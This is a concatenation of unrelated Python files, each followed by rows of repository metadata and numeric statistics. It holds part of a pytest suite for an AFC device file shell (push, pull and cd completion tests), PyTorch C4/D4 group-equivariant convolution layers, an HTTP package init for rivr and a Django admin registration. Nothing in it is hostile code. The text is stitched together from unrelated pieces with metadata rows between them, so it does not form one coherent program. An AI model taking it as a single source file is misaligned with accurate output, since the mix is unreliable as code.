assert get_completions(f'push {tmp_path}', str(tmp_path), afc_shell) == [f'{tmp_path} ']
assert get_completions(f'push {tmp_path}/', f'{tmp_path}/', afc_shell) == [f'{tmp_path}/temp1.txt',
f'{tmp_path}/temp2.txt']
second_completion = get_completions(f'push {tmp_path} D', 'D', afc_shell)
assert 'DCIM' in second_completion
assert 'Downloads' in second_completion
assert 'Books' not in second_completion
def test_pull_completion(afc_shell, tmp_path: Path):
completions = get_completions('pull D', 'D', afc_shell)
assert 'DCIM' in completions
assert 'Downloads' in completions
assert 'Books' not in completions
(tmp_path / 'temp1.txt').write_text('hey1')
(tmp_path / 'temp2.txt').write_text('hey2')
assert get_completions(f'pull DCIM {tmp_path}', str(tmp_path), afc_shell) == [f'{tmp_path} ']
assert get_completions(f'pull DCIM {tmp_path}/', f'{tmp_path}/', afc_shell) == [f'{tmp_path}/temp1.txt',
f'{tmp_path}/temp2.txt']
def test_ls(afc_shell):
out = afc_shell.app_cmd('ls')
assert isinstance(out, CommandResult)
filenames = str(out.stdout).strip().splitlines()
assert 'DCIM' in filenames
assert 'Downloads' in filenames
assert 'Books' in filenames
def test_pull_after_cd_single_file(afc_shell, tmp_path: Path):
"""
source:
temp1
└── temp.txt
cd temp1
pull temp.txt target
target
└── temp.txt
"""
file_name = 'temp.txt'
file_data = b'data'
afc_shell.afc.makedirs('temp1')
afc_shell.afc.set_file_contents(f'temp1/{file_name}', file_data)
out = afc_shell.app_cmd(f'pull {file_name} {tmp_path.absolute()}')
try:
assert 'AfcFileNotFoundError' in out.stderr
afc_shell.app_cmd('cd temp1')
out = afc_shell.app_cmd(f'pull {file_name} {tmp_path.absolute()}')
assert not out.stderr
assert (tmp_path / file_name).read_bytes() == file_data
finally:
afc_shell.afc.rm('temp1')
def test_pull_after_cd_single_file_with_prefix(afc_shell, tmp_path: Path):
"""
source:
temp1
└── temp2
└── temp3
└── temp.txt
cd temp1
pull temp2/temp3/temp.txt target
target
└── temp.txt
"""
file_name = 'temp.txt'
file_data = b'data'
afc_shell.afc.makedirs('temp1/temp2/temp3')
afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/{file_name}', file_data)
try:
afc_shell.app_cmd('cd temp1')
out = afc_shell.app_cmd(f'pull temp2/temp3/{file_name} {tmp_path.absolute()}')
assert not out.stderr
assert (tmp_path / file_name).read_bytes() == file_data
finally:
afc_shell.afc.rm('temp1')
def test_pull_after_cd_single_file_with_rename(afc_shell, tmp_path: Path):
"""
source:
temp1
└── temp.txt
cd temp1
pull temp.txt target/temp1.txt
target
└── temp1.txt
"""
file_name = 'temp.txt'
file_rename = 'temp1.txt'
file_data = b'data'
afc_shell.afc.makedirs('temp1')
afc_shell.afc.set_file_contents(f'temp1/{file_name}', file_data)
try:
afc_shell.app_cmd('cd temp1')
out = afc_shell.app_cmd(f'pull {file_name} {(tmp_path / file_rename).absolute()}')
assert not out.stderr
assert (tmp_path / file_rename).read_bytes() == file_data
finally:
afc_shell.afc.rm('temp1')
def test_pull_after_cd_recursive(afc_shell, tmp_path: Path):
"""
source:
temp1
└── temp2
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
cd temp1/temp2
pull temp3 target
target
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
"""
file_name = 'temp.txt'
file_name1 = 'temp.txt'
file_data = b'data'
file_data1 = b'data1'
afc_shell.afc.makedirs('temp1/temp2/temp3/temp4')
afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/{file_name}', file_data)
afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/temp4/{file_name1}', file_data1)
try:
afc_shell.app_cmd('cd temp1/temp2')
out = afc_shell.app_cmd(f'pull temp3 {tmp_path.absolute()}')
assert not out.stderr
assert (tmp_path / 'temp3' / file_name).read_bytes() == file_data
assert len(list((tmp_path / 'temp3').iterdir())) == 2
assert (tmp_path / 'temp3' / 'temp4' / file_name1).read_bytes() == file_data1
assert len(list((tmp_path / 'temp3' / 'temp4').iterdir())) == 1
finally:
afc_shell.afc.rm('temp1')
def test_pull_after_cd_recursive_current(afc_shell, tmp_path: Path):
"""
source:
temp1
└── temp2
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
cd temp1/temp2/temp3
pull . target
target
├── temp4
│ └── temp1.txt
└── temp.txt
"""
file_name = 'temp.txt'
file_name1 = 'temp1.txt'
file_data = b'data'
file_data1 = b'data1'
afc_shell.afc.makedirs('temp1/temp2/temp3/temp4')
afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/{file_name}', file_data)
afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/temp4/{file_name1}', file_data1)
try:
afc_shell.app_cmd('cd temp1/temp2/temp3')
out = afc_shell.app_cmd(f'pull . {tmp_path.absolute()}')
assert not out.stderr
assert (tmp_path / file_name).read_bytes() == file_data
assert len(list(tmp_path.iterdir())) == 2
assert (tmp_path / 'temp4' / file_name1).read_bytes() == file_data1
assert len(list((tmp_path / 'temp4').iterdir())) == 1
finally:
afc_shell.afc.rm('temp1')
def test_pull_after_cd_recursive_with_prefix(afc_shell, tmp_path: Path):
"""
source:
temp1
└── temp2
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
cd temp1
pull temp2/temp3 target
target
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
"""
file_name = 'temp.txt'
file_name1 = 'temp.txt'
file_data = b'data'
file_data1 = b'data1'
afc_shell.afc.makedirs('temp1/temp2/temp3/temp4')
afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/{file_name}', file_data)
afc_shell.afc.set_file_contents(f'temp1/temp2/temp3/temp4/{file_name1}', file_data1)
try:
afc_shell.app_cmd('cd temp1')
out = afc_shell.app_cmd(f'pull temp2/temp3 {tmp_path.absolute()}')
assert not out.stderr
assert (tmp_path / 'temp3' / file_name).read_bytes() == file_data
assert len(list((tmp_path / 'temp3').iterdir())) == 2
assert (tmp_path / 'temp3' / 'temp4' / file_name1).read_bytes() == file_data1
assert len(list((tmp_path / 'temp3' / 'temp4').iterdir())) == 1
finally:
afc_shell.afc.rm('temp1')
def test_push_after_cd_single_file_current(afc_shell, tmp_path: Path):
"""
source:
temp.txt
cd target
push source/temp.txt .
target
└── temp.txt
"""
file_name = 'temp.txt'
file_data = b'data'
source_file = (tmp_path / file_name)
source_file.write_bytes(file_data)
afc_shell.afc.makedirs('temp1')
afc_shell.app_cmd('cd temp1')
try:
out = afc_shell.app_cmd(f'push {source_file} .')
assert not out.stderr
assert afc_shell.afc.get_file_contents(f'temp1/{file_name}') == file_data
finally:
afc_shell.afc.rm('temp1')
def test_push_after_cd_single_file_with_prefix(afc_shell, tmp_path: Path):
"""
source:
temp.txt
cd temp1/temp2
push source/temp.txt temp3/temp.txt
target
temp1
└── temp2
└── temp3
└── temp.txt
"""
file_name = 'temp.txt'
file_data = b'data'
source_file = (tmp_path / file_name)
source_file.write_bytes(file_data)
afc_shell.afc.makedirs('temp1/temp2/temp3')
afc_shell.app_cmd('cd temp1/temp2')
try:
out = afc_shell.app_cmd(f'push {source_file} temp3/{file_name}')
assert not out.stderr
assert afc_shell.afc.get_file_contents(f'temp1/temp2/temp3/{file_name}') == file_data
finally:
afc_shell.afc.rm('temp1')
def test_push_after_cd_single_file_with_rename(afc_shell, tmp_path: Path):
"""
source:
temp.txt
cd temp1
push source/temp.txt temp1.txt
target
temp1
└── temp1.txt
"""
file_name = 'temp.txt'
file_rename = 'temp1.txt'
file_data = b'data'
source_file = (tmp_path / file_name)
source_file.write_bytes(file_data)
afc_shell.afc.makedirs('temp1')
afc_shell.app_cmd('cd temp1')
try:
out = afc_shell.app_cmd(f'push {source_file} {file_rename}')
assert not out.stderr
assert afc_shell.afc.get_file_contents(f'temp1/{file_rename}') == file_data
finally:
afc_shell.afc.rm('temp1')
def test_push_after_cd_recursive_current(afc_shell, tmp_path: Path):
"""
source:
temp2
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
mkdir temp1
cd temp1
push temp2 .
temp1
└── temp2
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
"""
(tmp_path / 'temp2' / 'temp3' / 'temp4').mkdir(parents=True)
(tmp_path / 'temp2' / 'temp3' / 'temp.txt').write_bytes(b'data')
(tmp_path / 'temp2' / 'temp3' / 'temp4' / 'temp1.txt').write_bytes(b'data1')
source_file = tmp_path / 'temp2'
afc_shell.afc.makedirs('temp1')
afc_shell.app_cmd('cd temp1')
try:
out = afc_shell.app_cmd(f'push {source_file} .')
assert not out.stderr
assert afc_shell.afc.get_file_contents('temp1/temp2/temp3/temp.txt') == b'data'
assert afc_shell.afc.get_file_contents('temp1/temp2/temp3/temp4/temp1.txt') == b'data1'
finally:
afc_shell.afc.rm('temp1')
def test_push_after_cd_recursive_with_slash_current(afc_shell, tmp_path: Path):
"""
source:
temp2
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
mkdir temp1
cd temp1
push temp2/ .
temp1
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
"""
(tmp_path / 'temp2' / 'temp3' / 'temp4').mkdir(parents=True)
(tmp_path / 'temp2' / 'temp3' / 'temp.txt').write_bytes(b'data')
(tmp_path / 'temp2' / 'temp3' / 'temp4' / 'temp1.txt').write_bytes(b'data1')
source_file = tmp_path / 'temp2'
afc_shell.afc.makedirs('temp1')
afc_shell.app_cmd('cd temp1')
try:
out = afc_shell.app_cmd(f'push {source_file}/ .')
assert not out.stderr
assert afc_shell.afc.get_file_contents('temp1/temp3/temp.txt') == b'data'
assert afc_shell.afc.get_file_contents('temp1/temp3/temp4/temp1.txt') == b'data1'
finally:
afc_shell.afc.rm('temp1')
def test_push_after_cd_recursive_with_prefix(afc_shell, tmp_path: Path):
"""
source:
temp2
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
mkdir temp1/temp1a/temp1b
cd temp1
push temp2 temp1a/temp1b
temp1
└── temp1a
└── temp1b
└── temp2
└── temp3
├── temp4
│ └── temp1.txt
└── temp.txt
"""
(tmp_path / 'temp2' / 'temp3' / 'temp4').mkdir(parents=True)
(tmp_path / 'temp2' / 'temp3' / 'temp.txt').write_bytes(b'data')
(tmp_path / 'temp2' / 'temp3' / 'temp4' / 'temp1.txt').write_bytes(b'data1')
source_file = tmp_path / 'temp2'
afc_shell.afc.makedirs('temp1/temp1a/temp1b')
afc_shell.app_cmd('cd temp1')
try:
out = afc_shell.app_cmd(f'push {source_file} temp1a/temp1b')
assert not out.stderr
assert afc_shell.afc.get_file_contents('temp1/temp1a/temp1b/temp2/temp3/temp.txt') == b'data'
assert afc_shell.afc.get_file_contents('temp1/temp1a/temp1b/temp2/temp3/temp4/temp1.txt') == b'data1'
finally:
afc_shell.afc.rm('temp1')
| 30.50478 | 116 | 0.624358 | 2,227 | 15,954 | 4.332286 | 0.069151 | 0.100332 | 0.066128 | 0.039179 | 0.839345 | 0.823072 | 0.805867 | 0.772388 | 0.747823 | 0.724917 | 0 | 0.028363 | 0.235364 | 15,954 | 522 | 117 | 30.563218 | 0.745061 | 0.121286 | 0 | 0.617021 | 0 | 0 | 0.204896 | 0.050007 | 0 | 0 | 0 | 0 | 0.237589 | 1 | 0.099291 | false | 0 | 0.024823 | 0.010638 | 0.141844 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0f2ce616a7e0014dd25f90385d1da17c560cab72 | 14,833 | py | Python | model/group_op.py | LingshenHe/Efficient-Equivariant-Network | 50eab7727907655df8932d905595cf9af504be2a | [
"MIT"
] | 8 | 2022-01-10T04:01:14.000Z | 2022-03-25T08:56:42.000Z | model/group_op.py | LingshenHe/Efficient-Equivariant-Network | 50eab7727907655df8932d905595cf9af504be2a | [
"MIT"
] | 1 | 2022-01-10T04:07:33.000Z | 2022-01-10T04:07:33.000Z | model/group_op.py | LingshenHe/Efficient-Equivariant-Network | 50eab7727907655df8932d905595cf9af504be2a | [
"MIT"
] | 1 | 2022-03-25T03:00:16.000Z | 2022-03-25T03:00:16.000Z | import torch.nn as nn
import torch
import math
class C_4_1x1(nn.Module):
def __init__(self, in_channels, out_channels, stride=1):
super(C_4_1x1, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
weight = torch.randn(out_channels, in_channels, 4) / math.sqrt(4 * in_channels / 2)
self.weight = torch.nn.Parameter(weight)
self.stride = stride
self.pool = nn.MaxPool2d(2, 2)
def forward(self, x):
weight = torch.zeros(self.out_channels, 4, self.in_channels, 4).to(x.device)
weight[::, 0, ...] = self.weight
weight[::, 1, ...] = self.weight[..., [3, 0, 1, 2]]
weight[::, 2, ...] = self.weight[..., [2, 3, 0, 1]]
weight[::, 3, ...] = self.weight[..., [1, 2, 3, 0]]
x = torch.nn.functional.conv2d(x, weight.reshape(self.out_channels * 4, self.in_channels * 4, 1, 1), stride=1,
padding=0)
if (self.stride != 1):
x = self.pool(x)
return x
class C_4_3x3(nn.Module):
def __init__(self, in_channels, out_channels, bias=False, stride=1):
super(C_4_3x3, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
weight = torch.randn(out_channels, in_channels, 4, 3, 3) / math.sqrt(4 * in_channels * 9 / 2)
self.weight = torch.nn.Parameter(weight)
self.pool = nn.MaxPool2d(2, 2)
self.stride = stride
self.bias = None
if (bias):
self.bias = torch.nn.Parameter(torch.randn(out_channels))
def forward(self, x):
weight = torch.zeros(self.out_channels, 4, self.in_channels, 4, 3, 3).to(x.device)
weight[::, 0, ...] = self.weight
weight[::, 1, ...] = torch.rot90(self.weight[..., [3, 0, 1, 2], ::, ::], 1, [3, 4])
weight[::, 2, ...] = torch.rot90(self.weight[..., [2, 3, 0, 1], ::, ::], 2, [3, 4])
weight[::, 3, ...] = torch.rot90(self.weight[..., [1, 2, 3, 0], ::, ::], 3, [3, 4])
x = torch.nn.functional.conv2d(x, weight.reshape(self.out_channels * 4, self.in_channels * 4, 3, 3), padding=1)
if (self.stride != 1):
x = self.pool(x)
if (self.bias is not None):
b, c, w, h = x.shape
x = (x.reshape(b, c // 4, 4, h, w) + self.bias.reshape(1, -1, 1, 1, 1)).reshape(x.shape)
return x
class C_4_BN(nn.Module):
def __init__(self, in_channels):
super(C_4_BN, self).__init__()
self.bn = nn.BatchNorm3d(in_channels)
def forward(self, x):
b, c, h, w = x.shape
return self.bn(x.reshape(b, c // 4, 4, h, w)).reshape(x.size())
class D_4_BN(nn.Module):
def __init__(self, in_channels, momentum=0.1):
super(D_4_BN, self).__init__()
self.bn = nn.BatchNorm3d(in_channels, momentum=momentum)
def forward(self, x):
b, c, h, w = x.shape
return self.bn(x.reshape(b, c // 8, 8, h, w)).reshape(x.size())
class C_4_1x1_(nn.Module):
def __init__(self, in_channels, out_channels):
super(C_4_1x1_, self).__init__()
self.net = nn.Conv3d(in_channels, out_channels, 1, bias=True)
self.in_channels = in_channels
self.out_channels = out_channels
def forward(self, x):
b, c, h, w = x.shape
x = self.net(x.view(b, c // 4, 4, h, w)).reshape(b, self.out_channels * 4, h, w)
return x
class E4_C4(nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_size,
reduction_ratio=2,
groups=1,
stride=1
):
super(E4_C4, self).__init__()
self.kernel_size = kernel_size
self.stride = stride
self.in_channels = in_channels
self.out_channels = out_channels
self.reduction_ratio = reduction_ratio
self.group_channels = groups
self.groups = self.out_channels // self.group_channels
self.dim_g = 4
self.v = nn.Sequential(C_4_1x1(in_channels, out_channels))
self.conv1 = nn.Sequential(C_4_1x1(in_channels, int(in_channels // reduction_ratio)),
nn.GroupNorm(int(in_channels // reduction_ratio),int(in_channels // reduction_ratio)*4),
nn.ReLU()
)
self.conv2 = nn.Sequential(C_4_1x1_(int(in_channels // reduction_ratio), kernel_size ** 2 * self.groups),
)
if stride > 1:
self.avgpool = nn.AvgPool2d(stride, stride)
self.unfold = nn.Unfold(kernel_size, 1, (kernel_size - 1) // 2, stride)
def forward(self, x):
weight = self.conv2(self.conv1(x if self.stride == 1 else self.avgpool(x)))
b, c, h, w = weight.shape
weight = weight.view(b, self.groups, self.kernel_size, self.kernel_size, 4, h, w)
weight[::, ::, ::, ::, 1, ::, ::] = torch.rot90(weight[::, ::, ::, ::, 1, ::, ::], 1, [2, 3])
weight[::, ::, ::, ::, 2, ::, ::] = torch.rot90(weight[::, ::, ::, ::, 2, ::, ::], 2, [2, 3])
weight[::, ::, ::, ::, 3, ::, ::] = torch.rot90(weight[::, ::, ::, ::, 3, ::, ::], 3, [2, 3])
weight = weight.reshape(b, self.groups, self.kernel_size ** 2, 4, h, w).unsqueeze(2).transpose(3, 4)
x = self.v(x)
out = self.unfold(x).view(b, self.groups, self.group_channels, 4, self.kernel_size ** 2, h, w)
out = (weight * out).sum(dim=4).view(b, self.out_channels * 4, h, w)
return out
class D_4_1x1(nn.Module):
def __init__(self, in_channels, out_channels, stride=1):
super(D_4_1x1, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
weight = torch.randn(out_channels, in_channels, 8) / math.sqrt(8 * in_channels / 2)
self.weight = torch.nn.Parameter(weight)
self.stride = stride
self.pool = nn.MaxPool2d(2, 2)
def forward(self, x):
weight = torch.zeros(self.out_channels, 8, self.in_channels, 8).to(x.device)
weight[::, 0, ...] = self.weight
weight[::, 1, ...] = self.weight[..., [3, 0, 1, 2, 5, 6, 7, 4]]
weight[::, 2, ...] = self.weight[..., [2, 3, 0, 1, 6, 7, 4, 5]]
weight[::, 3, ...] = self.weight[..., [1, 2, 3, 0, 7, 4, 5, 6]]
weight[::, 4, ...] = self.weight[..., [4, 5, 6, 7, 0, 1, 2, 3]]
weight[::, 5, ...] = self.weight[..., [5, 6, 7, 4, 3, 0, 1, 2]]
weight[::, 6, ...] = self.weight[..., [6, 7, 4, 5, 2, 3, 0, 1]]
weight[::, 7, ...] = self.weight[..., [7, 4, 5, 6, 1, 2, 3, 0]]
x = torch.nn.functional.conv2d(x, weight.reshape(self.out_channels * 8, self.in_channels * 8, 1, 1), stride=1,
padding=0)
if (self.stride != 1):
x = self.pool(x)
return x
class D_4_3x3(nn.Module):
def __init__(self, in_channels, out_channels, bias=False, stride=1):
super(D_4_3x3, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
weight = torch.randn(out_channels, in_channels, 8, 3, 3) / math.sqrt(8 * in_channels * 9 / 2)
self.weight = torch.nn.Parameter(weight)
self.pool = nn.MaxPool2d(2, 2)
self.stride = stride
self.bias = None
if (bias):
self.bias = torch.nn.Parameter(torch.randn(out_channels))
def forward(self, x):
weight = torch.zeros(self.out_channels, 8, self.in_channels, 8, 3, 3).to(x.device)
weight[::, 0, ...] = self.weight
weight[::, 1, ...] = torch.rot90(self.weight[..., [3, 0, 1, 2, 5, 6, 7, 4], ::, ::], 1, [3, 4])
weight[::, 2, ...] = torch.rot90(self.weight[..., [2, 3, 0, 1, 6, 7, 4, 5], ::, ::], 2, [3, 4])
weight[::, 3, ...] = torch.rot90(self.weight[..., [1, 2, 3, 0, 7, 4, 5, 6], ::, ::], 3, [3, 4])
weight[::, 4, ...] = torch.rot90(self.weight[..., [4, 5, 6, 7, 0, 1, 2, 3], ::, ::].transpose(3, 4), 3, [3, 4])
weight[::, 5, ...] = torch.rot90(self.weight[..., [5, 6, 7, 4, 3, 0, 1, 2], ::, ::].transpose(3, 4), 2, [3, 4])
weight[::, 6, ...] = torch.rot90(self.weight[..., [6, 7, 4, 5, 2, 3, 0, 1], ::, ::].transpose(3, 4), 1, [3, 4])
weight[::, 7, ...] = torch.rot90(self.weight[..., [7, 4, 5, 6, 1, 2, 3, 0], ::, ::].transpose(3, 4), 0, [3, 4])
x = torch.nn.functional.conv2d(x, weight.reshape(self.out_channels * 8, self.in_channels * 8, 3, 3), padding=1)
if (self.stride != 1):
x = self.pool(x)
if (self.bias is not None):
b, c, w, h = x.shape
x = (x.reshape(b, c // 8, 8, h, w) + self.bias.reshape(1, -1, 1, 1, 1)).reshape(x.shape)
return x
class D_4_1x1_(nn.Module):
def __init__(self, in_channels, out_channels):
super(D_4_1x1_, self).__init__()
self.net = nn.Conv3d(in_channels, out_channels, 1, bias=True)
self.in_channels = in_channels
self.out_channels = out_channels
def forward(self, x):
b, c, h, w = x.shape
x = self.net(x.view(b, c // 8, 8, h, w)).reshape(b, self.out_channels * 8, h, w)
return x
class E4_D4(nn.Module):
def __init__(self,
in_channels,
out_channels,
kernel_size,
reduction_ratio=2,
groups=1,
stride=1):
super(E4_D4, self).__init__()
self.kernel_size = kernel_size
self.stride = stride
self.in_channels = in_channels
self.out_channels = out_channels
self.reduction_ratio = reduction_ratio
self.group_channels = groups
self.groups = self.out_channels // self.group_channels
self.dim_g = 8
self.v = nn.Sequential(D_4_1x1(in_channels, out_channels))
self.conv1 = nn.Sequential(D_4_1x1(in_channels, int(in_channels // reduction_ratio)),
nn.GroupNorm(int(in_channels // reduction_ratio), int(in_channels // reduction_ratio)*8),
nn.ReLU()
)
self.conv2 = nn.Sequential(D_4_1x1_(int(in_channels // reduction_ratio), kernel_size ** 2 * self.groups),
)
if stride > 1:
self.avgpool = nn.AvgPool2d(stride, stride)
self.unfold = nn.Unfold(kernel_size, 1, (kernel_size - 1) // 2, stride)
def forward(self, x):
weight = self.conv2(self.conv1(x if self.stride == 1 else self.avgpool(x)))
b, c, h, w = weight.shape
weight = weight.view(b, self.groups, self.kernel_size, self.kernel_size, 8, h, w)
weight[::, ::, ::, ::, 1, ::, ::] = torch.rot90(weight[::, ::, ::, ::, 1, ::, ::], 1, [2, 3])
weight[::, ::, ::, ::, 2, ::, ::] = torch.rot90(weight[::, ::, ::, ::, 2, ::, ::], 2, [2, 3])
weight[::, ::, ::, ::, 3, ::, ::] = torch.rot90(weight[::, ::, ::, ::, 3, ::, ::], 3, [2, 3])
weight[::, ::, ::, ::, 4, ::, ::] = torch.rot90(weight[::, ::, ::, ::, 4, ::, ::].transpose(2, 3), 3, [2, 3])
weight[::, ::, ::, ::, 5, ::, ::] = torch.rot90(weight[::, ::, ::, ::, 5, ::, ::].transpose(2, 3), 2, [2, 3])
weight[::, ::, ::, ::, 6, ::, ::] = torch.rot90(weight[::, ::, ::, ::, 6, ::, ::].transpose(2, 3), 1, [2, 3])
weight[::, ::, ::, ::, 7, ::, ::] = torch.rot90(weight[::, ::, ::, ::, 7, ::, ::].transpose(2, 3), 0, [2, 3])
weight = weight.view(b, self.groups, self.kernel_size ** 2, 8, h, w).unsqueeze(2).transpose(3, 4)
x = self.v(x)
out = self.unfold(x).view(b, self.groups, self.group_channels, 8, self.kernel_size ** 2, h, w)
out = (weight * out).sum(dim=4).view(b, self.out_channels * 8, h, w)
return out
def C_4_rot(x):
b, c, h, w = x.shape
return torch.rot90(x.view(b, c // 4, 4, h, w)[::, ::, [3, 0, 1, 2]], 1, [3, 4]).reshape(x.shape)
def D_4_rot(x):
b, c, h, w = x.shape
return torch.rot90(x.view(b, c // 8, 8, h, w)[::, ::, [3, 0, 1, 2, 5, 6, 7, 4]], 1, [3, 4]).reshape(x.shape)
def D_4_m(x):
b, c, h, w = x.shape
return torch.rot90(x.view(b, c // 8, 8, h, w)[::, ::, [4, 5, 6, 7, 0, 1, 2, 3]].transpose(3, 4), 3, [3, 4]).reshape(
x.shape)
class C_4_Conv(nn.Module):
def __init__(self, in_channels, out_channels):
super(C_4_Conv, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
weight = torch.randn(out_channels, in_channels, 3, 3) / math.sqrt(9 * in_channels / 2)
self.weight = torch.nn.Parameter(weight)
def forward(self, input):
weight = torch.zeros(self.out_channels, 4, self.in_channels, 3, 3).to(input.device)
weight[::, 0] = self.weight
weight[::, 1] = torch.rot90(self.weight[::], 1, [2, 3])
weight[::, 2] = torch.rot90(self.weight[::], 2, [2, 3])
weight[::, 3] = torch.rot90(self.weight[::], 3, [2, 3])
out = nn.functional.conv2d(input, weight.reshape(self.out_channels * 4, self.in_channels, 3, 3), padding=1)
return out
class D_4_Conv(nn.Module):
def __init__(self, in_channels, out_channels):
super(D_4_Conv, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
weight = torch.randn(out_channels, in_channels, 3, 3) / math.sqrt(9 * in_channels / 2)
self.weight = torch.nn.Parameter(weight)
def forward(self, input):
weight = torch.zeros(self.out_channels, 8, self.in_channels, 3, 3).to(input.device)
weight[::, 0] = self.weight
weight[::, 1] = torch.rot90(self.weight[::], 1, [2, 3])
weight[::, 2] = torch.rot90(self.weight[::], 2, [2, 3])
weight[::, 3] = torch.rot90(self.weight[::], 3, [2, 3])
weight[::, 4] = torch.rot90(self.weight[::].transpose(2, 3), 3, [2, 3])
weight[::, 5] = torch.rot90(self.weight[::].transpose(2, 3), 2, [2, 3])
weight[::, 6] = torch.rot90(self.weight[::].transpose(2, 3), 1, [2, 3])
weight[::, 7] = torch.rot90(self.weight[::].transpose(2, 3), 0, [2, 3])
out = nn.functional.conv2d(input, weight.reshape(self.out_channels * 8, self.in_channels, 3, 3), padding=1)
return out
class C_4_Pool(nn.Module):
def __init__(self):
super(C_4_Pool, self).__init__()
self.pool = nn.MaxPool3d((4, 1, 1), (4, 1, 1))
def forward(self, x):
b, c, h, w = x.shape
return self.pool(x.reshape(b, c // 4, 4, h, w)).squeeze(2)
class D_4_Pool(nn.Module):
def __init__(self):
super(D_4_Pool, self).__init__()
self.pool = nn.MaxPool3d((8, 1, 1), (8, 1, 1))
def forward(self, x):
b, c, h, w = x.shape
return self.pool(x.reshape(b, c // 8, 8, h, w)).squeeze(2)
#Right
| 43.626471 | 124 | 0.529697 | 2,156 | 14,833 | 3.476345 | 0.044063 | 0.096064 | 0.063509 | 0.053369 | 0.966111 | 0.955437 | 0.933022 | 0.910607 | 0.874049 | 0.854703 | 0 | 0.063948 | 0.272568 | 14,833 | 339 | 125 | 43.755162 | 0.630677 | 0.000337 | 0 | 0.561594 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.112319 | false | 0 | 0.01087 | 0 | 0.235507 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0f34744602c541a7088ad50a990d81dddfce1057 | 467 | py | Python | rivr/http/__init__.py | rivrproject/rivr | b4f7eb481cc28ae48169f1d3982b896b7cfd5c91 | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2015-02-23T12:14:54.000Z | 2015-11-08T13:25:02.000Z | rivr/http/__init__.py | rivrproject/rivr | b4f7eb481cc28ae48169f1d3982b896b7cfd5c91 | [
"BSD-2-Clause-FreeBSD"
] | 8 | 2015-01-10T09:37:13.000Z | 2020-10-10T15:32:27.000Z | rivr/http/__init__.py | rivrproject/rivr | b4f7eb481cc28ae48169f1d3982b896b7cfd5c91 | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | from rivr.http.request import Request
from rivr.http.response import (
Http404,
Response,
ResponseNoContent,
ResponseNotAllowed,
ResponseNotFound,
ResponseNotModified,
ResponsePermanentRedirect,
ResponseRedirect,
)
__all__ = [
'Request',
'Http404',
'Response',
'ResponseNoContent',
'ResponseNotAllowed',
'ResponseNotFound',
'ResponseNotModified',
'ResponsePermanentRedirect',
'ResponseRedirect',
]
| 19.458333 | 37 | 0.69379 | 29 | 467 | 11.034483 | 0.482759 | 0.05 | 0.075 | 0.3125 | 0.7875 | 0.7875 | 0.7875 | 0.7875 | 0 | 0 | 0 | 0.016304 | 0.211991 | 467 | 23 | 38 | 20.304348 | 0.853261 | 0 | 0 | 0 | 0 | 0 | 0.284797 | 0.053533 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 1 | 0 | 1 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
0f562eebdfd9bace25c6e277a65468e7c8ff98b3 | 146 | py | Python | clases/admin.py | Etxea/gestion_eide_web | 8a59be1ddb59a4713cb3346534fd01f643d8f924 | [
"MIT"
] | null | null | null | clases/admin.py | Etxea/gestion_eide_web | 8a59be1ddb59a4713cb3346534fd01f643d8f924 | [
"MIT"
] | null | null | null | clases/admin.py | Etxea/gestion_eide_web | 8a59be1ddb59a4713cb3346534fd01f643d8f924 | [
"MIT"
] | null | null | null | from django.contrib import admin
from models import *
class ClaseAdmin(admin.ModelAdmin):
pass
admin.site.register(Clase, ClaseAdmin)
| 14.6 | 38 | 0.753425 | 18 | 146 | 6.111111 | 0.722222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171233 | 146 | 9 | 39 | 16.222222 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.2 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 6 |
